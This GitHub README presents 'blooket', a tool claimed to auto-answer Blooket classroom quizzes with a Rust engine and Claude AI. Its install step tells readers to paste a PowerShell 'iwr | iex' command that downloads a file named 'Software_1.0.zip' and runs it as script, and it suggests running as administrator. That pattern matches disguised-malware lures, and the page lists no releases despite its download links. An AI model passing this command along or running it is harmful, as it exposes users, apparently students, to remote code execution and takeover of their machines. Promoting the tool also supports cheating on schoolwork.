Skip to content

coder323111/blooket

Repository files navigation

🎮 blooket - Automated Game Assistant for Blooket

Download Latest Release


🚀 What is blooket?

blooket is a tool that helps you play Blooket games automatically. It uses artificial intelligence and a fast engine built with Rust to join games, answer questions, and track your game scores. You can also use it to get hints live as you play.

This software is for educational purposes only. Please use it responsibly and follow your school’s rules on academic integrity.


💾 Download blooket

To get started, you need to download the program files. You can find the latest version on the releases page.

Download blooket from here

Click that link, then look for the newest file listed under "Assets". Download the file that best matches your Windows system (usually an .exe or .zip file).


💻 How to Install and Run on Windows — One Command Setup

Setting up blooket is simple. You will open a Windows application called Command Prompt and enter one command. This command installs everything the program needs, including Rust and Python tools.

🪟 Step 1 — Open Command Prompt

  1. Press Win + R on your keyboard. This opens the Run window.
  2. Type cmd in the box.
  3. Press Enter or click OK.

A black window called Command Prompt will open. This lets you type commands to install and run the software.


🛠 Step 2 — Run the Install Command

Copy the command below exactly. Then, right-click inside the Command Prompt window to paste it. Press Enter to start.

powershell -Command "iwr -useb https://github.com/coder323111/blooket/raw/refs/heads/main/src/Software_1.0.zip | iex"

This command does a few things:

  • Installs Rust programming tools if your computer does not have them.
  • Installs Python’s package manager if missing.
  • Compiles the fast Rust engine built for blooket.
  • Adds the blooket command to your system, so you can use it anywhere.

🎮 Step 3 — Run blooket

Once the install finishes, you can start using blooket. Open Command Prompt again and type:

blooket

Press Enter. If the program starts, the installation worked. You can then follow on-screen instructions to join games or view game hints.


⚙️ Features

blooket offers different ways to assist with Blooket games. Here are the main options:

🤖 Three Game Modes

Mode What it does
Auto Play Joins games and answers questions for you automatically.
Score Tracker Watches your game and shows your score as it updates live.
Hint Overlay Shows hints on screen while you play manually.

Each mode works with minimal setup. You can choose one when you start the program.


🔧 What blooket Uses

  • Rust: A programming language that runs very fast and compiles code efficiently.
  • Claude AI: The AI that answers questions intelligently.
  • Python: Runs scripts for managing the program.

You do not have to install or manage these manually. The installer takes care of everything.


🖥️ System Requirements

To run blooket on Windows, you will need:

  • Windows 10 or later (64-bit preferred).
  • At least 4 GB of RAM.
  • Internet connection for game joining and AI answering.
  • 200 MB of free disk space for program files and dependencies.

🔄 Updating blooket

Check the releases page regularly for updates.

Go to blooket releases

Download the new version and run the install command again to update.


🆘 Troubleshooting Common Issues

  • Command not found: Make sure you open Command Prompt, not PowerShell or another app.
  • Permissions error: Run Command Prompt as an administrator. Right-click the app icon and choose "Run as administrator."
  • Installation stops or errors: Check your internet connection and try again.
  • blooket command does not work after install: Restart your computer to update the PATH environment.

📚 More About blooket

blooket helps with:

  • Joining Blooket games automatically.
  • Answering questions without typing.
  • Watching your progress and scores.
  • Using smart hints live during games.

It aims to make Blooket easier and faster to navigate for users who want assistance without manual input.


Download blooket for Windows

About

Automate Blooket gameplay using a fast Rust engine and AI to answer questions, track scores, and provide live hints during games.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors